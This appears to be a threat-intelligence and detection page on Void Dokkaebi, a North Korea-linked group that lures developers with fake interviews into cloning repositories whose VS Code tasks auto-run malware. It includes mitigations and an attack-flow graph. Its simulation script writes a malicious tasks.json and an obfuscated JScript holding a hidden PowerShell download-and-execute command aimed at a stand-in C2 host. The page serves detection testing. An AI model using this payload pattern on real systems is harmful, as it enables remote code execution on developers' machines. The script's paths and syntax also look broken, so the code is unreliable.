Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Void Dokkaebi, a North Korea-linked threat group, is using fake job interview offers to lure developers into cloning malicious repositories. Once opened, these repositories abuse injected VS Code tasks and obfuscated JavaScript to turn trusted code projects into automated malware delivery channels. Infected repositories can then help spread the compromise further across developer environments and connected ecosystems.
Investigation
Trend Micro uncovered more than 750 infected public repositories, over 500 malicious VS Code task configurations, and 101 cases involving a custom batch script designed to tamper with commits. Analysis showed that the malicious code fetched payloads through blockchain-based services and ultimately delivered a DEV#POPPER RAT variant. That malware then communicated with attacker infrastructure through both WebSocket and HTTP-based channels.
Mitigation
Recommended defenses include isolating code received through interview processes, adding .vscode/ to .gitignore, enforcing signed commits and branch protection, and auditing repositories for known infection markers. Security teams should also monitor blockchain API traffic for suspicious behavior and block access to the identified command-and-control URLs. Developers should treat VS Code workspace trust prompts as a meaningful security checkpoint, not a routine click-through action.
Response
If infection is suspected, isolate the affected workstation immediately, revoke any exposed credentials, remove malicious .vscode task files and injected JavaScript, and perform a full review of the impacted repository. Network defenses should also be updated to detect the known command-and-control patterns and block outbound communication to the identified blockchain endpoints.
"graph TB %% Class definitions classDef stage fill:#e6f7ff classDef technique fill:#fff2cc classDef file fill:#f0e68c classDef malware fill:#ffcccc classDef indicator fill:#d9ead3 %% Node definitions stage_initial["<b>Stage</b> – Initial Access<br/>Attacker lures developer with fake interview and malicious Git repository"] class stage_initial stage tech_user_exec["<b>Technique</b> – T1204 User Execution<br/>Victim executes malicious content such as a link or copied code"] class tech_user_exec technique tech_malicious_link["<b>Technique</b> – T1204.001 Malicious Link<br/>Link directs victim to malicious repository"] class tech_malicious_link technique tech_malicious_copy["<b>Technique</b> – T1204.004 Malicious Copy and Paste<br/>Developer copies code from the malicious repository"] class tech_malicious_copy technique stage_repo_harvest["<b>Stage</b> – Repository Harvest<br/>Cloned repository gives access to source code and potential credentials"] class stage_repo_harvest stage tech_code_repo["<b>Technique</b> – T1213.003 Data from Information Repositories: Code Repositories<br/>Adversary extracts data from code repositories"] class tech_code_repo technique stage_execution_vs["<b>Stage</b> – Execution via VS Code<br/>.vscode/tasks.json runs downloader automatically on folder open"] class stage_execution_vs stage tech_trusted_ide["<b>Technique</b> – T1127 Trusted Developer Utilities Proxy Execution<br/>Abuse of trusted IDE extensions to execute code"] class tech_trusted_ide technique tech_ide_ext["<b>Technique</b> – T1176.002 Software Extensions: IDE Extensions<br/>Malicious tasks.json triggers execution"] class tech_ide_ext technique file_tasks_json["<b>File</b> – .vscode/tasks.json<br/>Configured with runOn folderOpen to launch downloader"] class file_tasks_json file stage_payload_retrieval["<b>Stage</b> – Payload Retrieval<br/>Downloader fetches payloads from blockchain RPC endpoints"] class stage_payload_retrieval stage tech_resource_hijack["<b>Technique</b> – T1496 Resource Hijacking<br/>Utilizes blockchain infrastructure for payload delivery"] class tech_resource_hijack technique tech_obfuscation["<b>Technique</b> – T1027.007 Obfuscated Files or Information: Dynamic API Resolution<br/>Code hides API endpoints and resolves them at runtime"] class tech_obfuscation technique indicator_blockchain["<b>Indicator</b> – Outbound blockchain RPC connections<br/>Calls to api.trongrid.io aptoslabs.com and BSC RPC"] class indicator_blockchain indicator stage_module_hijack["<b>Stage</b> – Module Hijacking<br/>Hidden .node_modules directory placed to preload malicious Node modules"] class stage_module_hijack stage tech_shared_modules["<b>Technique</b> – T1129 Shared Modules<br/>Malicious module loaded before legitimate ones"] class tech_shared_modules technique file_node_modules["<b>File</b> – .node_modules directory<br/>Contains hijacked module"] class file_node_modules file stage_rat_deployment["<b>Stage</b> – RAT Deployment<br/>DEV#POPPER RAT variant establishes WebSocket C2 and exfiltrates data"] class stage_rat_deployment stage malware_devpopper["<b>Malware</b> – DEV#POPPER RAT<br/>WebSocket C2, file exfiltration, avoids CI/CD pipelines"] class malware_devpopper malware indicator_c2["<b>Indicator</b> – WebSocket C2 URLs"] class indicator_c2 indicator stage_persistence["<b>Stage</b> – Persistence and Commit Tampering<br/>Injected malicious JavaScript in config files and batch script amends commits"] class stage_persistence stage tech_timestomp["<b>Technique</b> – T1070.006 Indicator Removal: Timestomp<br/>Alters system clock to backdate commits"] class tech_timestomp technique file_postcss["<b>File</b> – postcss.config.mjs<br/>Obfuscated JavaScript injected"] class file_postcss file file_batch["<b>File</b> – temp_auto_push.bat<br/>Automates commit amendment and forceu2011push"] class file_batch file stage_propagation["<b>Stage</b> – Propagation<br/>Malicious .vscode folder and code committed, downstream developers inherit infection"] class stage_propagation stage tech_propagation["<b>Technique</b> – T1127 Trusted Developer Utilities Proxy Execution<br/>Repeated IDE abuse across cloned repositories"] class tech_propagation technique tech_repo_spread["<b>Technique</b> – T1213.003 Data from Information Repositories<br/>Malicious code spreads via repository sharing"] class tech_repo_spread technique indicator_detection["<b>Indicator</b> – Detection IOCs<br/>Blockchain RPC, WebSocket C2, /verify-human/ and /u/f HTTP paths"] class indicator_detection indicator %% Connections stage_initial –>|uses| tech_user_exec tech_user_exec –>|includes| tech_malicious_link tech_user_exec –>|includes| tech_malicious_copy tech_malicious_link –>|delivers| stage_repo_harvest tech_malicious_copy –>|delivers| stage_repo_harvest stage_repo_harvest –>|exploits| tech_code_repo stage_repo_harvest –>|leads to| stage_execution_vs stage_execution_vs –>|uses| tech_trusted_ide stage_execution_vs –>|uses| tech_ide_ext stage_execution_vs –>|executes| file_tasks_json stage_execution_vs –>|triggers| stage_payload_retrieval stage_payload_retrieval –>|uses| tech_resource_hijack stage_payload_retrieval –>|uses| tech_obfuscation stage_payload_retrieval –>|creates| indicator_blockchain stage_payload_retrieval –>|leads to| stage_module_hijack stage_module_hijack –>|uses| tech_shared_modules stage_module_hijack –>|contains| file_node_modules stage_module_hijack –>|leads to| stage_rat_deployment stage_rat_deployment –>|deploys| malware_devpopper malware_devpopper –>|communicates with| indicator_c2 stage_rat_deployment –>|prepares for| stage_persistence stage_persistence –>|uses| tech_timestomp stage_persistence –>|modifies| file_postcss stage_persistence –>|runs| file_batch stage_persistence –>|enables| stage_propagation stage_propagation –>|uses| tech_propagation stage_propagation –>|uses| tech_repo_spread stage_propagation –>|produces| indicator_detection "
Attack Flow
Detections
Possible Publicnode Ethereum Abuse Attempt As C2 Channel (via dns_query)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [MACOS] (via file_event)
View
Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [LINUX] (via file_event)
View
IOCs (SourceIP) to detect: Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
View
IOCs (DestinationIP) to detect: Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
View
Detection of Void Dokkaebi Malicious VS Code Tasks and Obfuscated JavaScript [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An attacker who has convinced a developer to clone a malicious repository drops a covert VS Codetasks.jsoninto the project’s.vscodefolder. The task references atemp_auto_push.batscript located in the system’s temporary directory. The batch file is generated on‑the‑fly from an obfuscated JavaScript snippet that embeds the markersglobal['!']andglobal['_V']. When the developer opens the folder in VS Code, the task auto‑runs, executing the batch file, which ultimately reaches out to a C2 server. This chain fulfills T1053.007 (VS Code task), T1127.003 (persistent shortcut via batch), and T1027.007 (obfuscation).The steps are:
- Place malicious
tasks.jsonwith the required strings. - Create the obfuscated JavaScript that, when evaluated, writes
temp_auto_push.batcontaining the malicious command. - Trigger VS Code task execution (simulated by invoking the task via
code --folder-uriCLI).
- Place malicious
-
Regression Test Script:
# ------------------------------------------------- # Void Dokkaebi VS Code Task & Obfuscated JS Simulation # ------------------------------------------------- $vscodeDir = "$env:USERPROFILE.vscode" $taskFile = Join-Path $vscodeDir "tasks.json" $tempBat = "$env:TEMPtemp_auto_push.bat" $jsPayload = @" (function(){ var g = global; g['!'] = true; // marker for detection g['_V'] = 'payload'; var cmd = 'powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString(''http://malicious.c2/payload.ps1''))"'; var fso = new ActiveXObject('Scripting.FileSystemObject'); var file = fso.CreateTextFile('$tempBat', true); file.WriteLine(cmd); file.Close(); })(); "@ # 1. Ensure .vscode folder exists New-Item -ItemType Directory -Path $vscodeDir -Force | Out-Null # 2. Write malicious tasks.json @" { "version": "2.0.0", "tasks": [ { "label": "AutoPush", "type": "shell", "command": "cscript //nologo //E:jscript //B - <<'JS'n$jsPayloadnJS" } ] } "@ | Set-Content -Path $taskFile -Encoding UTF8 # 3. (Optional) Directly invoke the task to mimic VS Code auto‑run # Note: In a real environment VS Code would parse and run this task. Write-Host "Malicious VS Code task deployed. Triggering via simulated run..." cscript //nologo //E:jscript //B - <<'JS' $jsPayload JS Write-Host "Simulation complete. Check SIEM for alert." -
Cleanup Commands:
# Remove malicious artifacts Remove-Item -Path "$env:USERPROFILE.vscodetasks.json" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPtemp_auto_push.bat" -Force -ErrorAction SilentlyContinue # Optionally clear the .vscode directory if it was created solely for the test if ((Get-ChildItem "$env:USERPROFILE.vscode").Count -eq 0) { Remove-Item -Path "$env:USERPROFILE.vscode" -Force -Recurse -ErrorAction SilentlyContinue } Write-Host "Cleanup completed."